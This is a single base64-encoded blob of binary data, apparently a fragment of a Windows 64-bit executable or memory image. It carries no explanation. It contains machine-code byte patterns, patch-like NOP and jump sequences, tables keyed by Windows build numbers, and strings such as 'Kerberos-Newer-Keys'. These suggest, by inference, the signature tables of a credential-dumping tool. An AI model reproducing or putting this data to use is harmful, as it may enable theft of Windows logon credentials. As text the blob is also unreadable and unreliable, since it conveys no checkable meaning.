AAAAAAADMPAqAAQAAAAAAAAAAAAAA/wABCAAAAAAAAAAAAAAAAAAAAAAAAAAAgEMDgAEAAAAAAAAAAAAAANQ8CoABAAAAAAAAAAAAAAABAAEIAAAAAAAAAAAAAAAAAAAAAAAAAACIUgOAAQAAAAAAAAAAAAAA4DwKgAEAAAAAAAAAAAAAAP8AAQgAAAAAAAAAAAAAAAAAAAAAAAAAAOhSA4ABAAAAAAAAAAAAAADoPAqAAQAAAAAAAAAAAAAAAQABCAAAAAAAAAAAAAAAAAAAAAAAAAAAXEEDgAEAAAAAAAAAAAAAAPA8CoABAAAAAAAAAAAAAAABAAEIAAAAAAAAAAAAAAAAAAAAAAAAAADQRgOAAQAAAAAAAAAAAAAA9DwKgAEAAAAAAAAAAAAAAAEAAQgAAAAAAAAAAAAAAAAAAAAAAAAAAIRHA4ABAAAAAAAAAAAAAAD8PAqAAQAAAAAAAAAAAAAAAQABCAAAAAAAAAAAAAAAAAAAAAAAAAAARFQDgAEAAAAAAAAAAAAAAAQ9CoABAAAAAAAAAAAAAAACAAEKAAAAAAAAAAAAAAAAAAAAAAAAAABUTwOAAQAAAAAAAAAAAAAACD0KgAEAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAADBIA4ABAAAAAAAAAAAAAAAQPQqAAQAAAAAAAAAAAAAAAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAkEgDgAEAAAAAAAAAAAAAABg9CoABAAAAAAAAAAAAAAACACEIAAAAAAAAAAAAAAAAAAAAAAAAAAAETwOAAQAAAAAAAAAAAAAAJD0KgAEAAAAAAAAAAAAAAAAAASAAAAAAAAAAAAAAAAAAAAAAAAAAAFRPA4ABAAAAAAAAAAAAAAAwPQqAAQAAAAAAAAAAAAAAAAABIAAAAAAAAAAAAAAAAAAAAAAAAAAAjE8DgAEAAAAAAAAAAAAAAEA9CoABAAAAAAAAAAAAAAACAAEIAAAAAAAAAAAAAAAAAAAAAAAAAADETwOAAQAAAAAAAAAAAAAAWD0KgAEAAAAAAAAAAAAAAAEAAQgAAAAAAAAAAAAAAAAAAAAAAAAAAABQA4ABAAAAAAAAAAAAAABkPQqAAQAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAEEkDgAEAAAAAAAAAAAA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